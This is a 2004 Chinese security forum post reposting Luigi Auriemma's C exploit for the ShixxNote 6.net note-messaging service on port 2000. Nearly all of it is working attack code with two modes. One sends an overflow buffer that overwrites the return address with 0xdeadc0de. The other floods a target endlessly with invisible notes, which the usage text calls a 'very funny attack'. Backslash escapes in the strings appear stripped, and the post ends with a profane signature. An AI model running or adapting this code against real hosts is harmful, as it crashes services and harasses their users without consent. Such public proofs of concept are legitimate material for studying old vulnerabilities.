‹‹ 上一主题 | 下一主题 ››
发新话题
打印

ShixxNote 6.net buffer overflow exploit by luigi auriemma

EvilOctal

团队执行官

Rank: 8Rank: 8

E.S.T社区执行帐号

帖子
9833 
精华
769 
积分
40415 
阅读权限
200 
性别
男 
在线时间
3978 小时 
注册时间
2004-7-4 
最后登录
2008-10-11 
楼主 发表于 2004-10-28 12:40  只看该作者

ShixxNote 6.net buffer overflow exploit by luigi auriemma

文章作者:Luigi Auriemma
复制内容到剪贴板
代码:
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
   #include <winsock.h>
   #include "winerr.h"

   #define close  closesocket
#else
   #include <unistd.h>
   #include <sys/socket.h>
   #include <sys/types.h>
   #include <arpa/inet.h>
   #include <netdb.h>
   #include <netinet/in.h>
#endif



#define VER    "0.1"
#define PORT    2000
#define EIP    "xdexc0xadxde"  /* return address = 0xdeadc0de */
#define BOF    "attacker"
           "~~"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" EIP "aaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~~~~~~~~~~~~~~~~~~~"
#define FLOOD  "~~~~~~~~~~~~~~~~~~~~~~"



u_long resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
   int    sd;
   u_short port = PORT;
   struct  sockaddr_in peer;


   setbuf(stdout, NULL);

   fputs("n"
      "ShixxNote 6.net buffer overflow "VER"n"
      "by Luigi Auriemman"
      "e-mail: [email]aluigi@altervista.orgn[/email]"
      "web:    [url]http://aluigi.altervista.orgn[/url]"
      "n", stdout);

   if(argc < 3) {
      printf("nUsage: %s <attack> <server> [port(%d)]n"
        "n"
        "Attack:n"
        "1 = buffer-overflow, the return address will be overwritten with 0xdeadc0den"
        "2 = silent flood, the remote host will be flooded by tons of invisible notesn"
        "    (very funny attack, moreover if the victim has sounds enabled)n"
        "n", argv[0], PORT);
      exit(1);
   }

#ifdef WIN32
   WSADATA    wsadata;
   WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

   if(argc > 3) port = atoi(argv[3]);

   peer.sin_addr.s_addr = resolv(argv[2]);
   peer.sin_port      = htons(port);
   peer.sin_family     = AF_INET;

   printf("- target  %s:%hun",
      inet_ntoa(peer.sin_addr), port);

   if(argv[1][0] == &#39;2&#39;) {
      for(;;) {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        if(send(sd, FLOOD, sizeof(FLOOD) - 1, 0)
          < 0) std_err();
        close(sd);
        fputc(&#39;.&#39;, stdout);
      }
   } else {
      sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      if(sd < 0) std_err();
      fputs("- connectionn", stdout);
      if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
       < 0) std_err();
      fputs("- send buffer-overflow datan", stdout);
      if(send(sd, BOF, sizeof(BOF) - 1, 0)
       < 0) std_err();
      close(sd);
   }

   printf("- the return address should be overwritten with 0x%08lxnn",
      *(u_long *)EIP);

   return(0);
}



u_long resolv(char *host) {
   struct  hostent *hp;
   u_long  host_ip;

   host_ip = inet_addr(host);
   if(host_ip == INADDR_NONE) {
      hp = gethostbyname(host);
      if(!hp) {
        printf("nError: Unable to resolve hostname (%s)n", host);
        exit(1);
      } else host_ip = *(u_long *)(hp->h_addr);
   }
   return(host_ip);
}



#ifndef WIN32
   void std_err(void) {
      perror("nError");
      exit(1);
   }
#endif
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题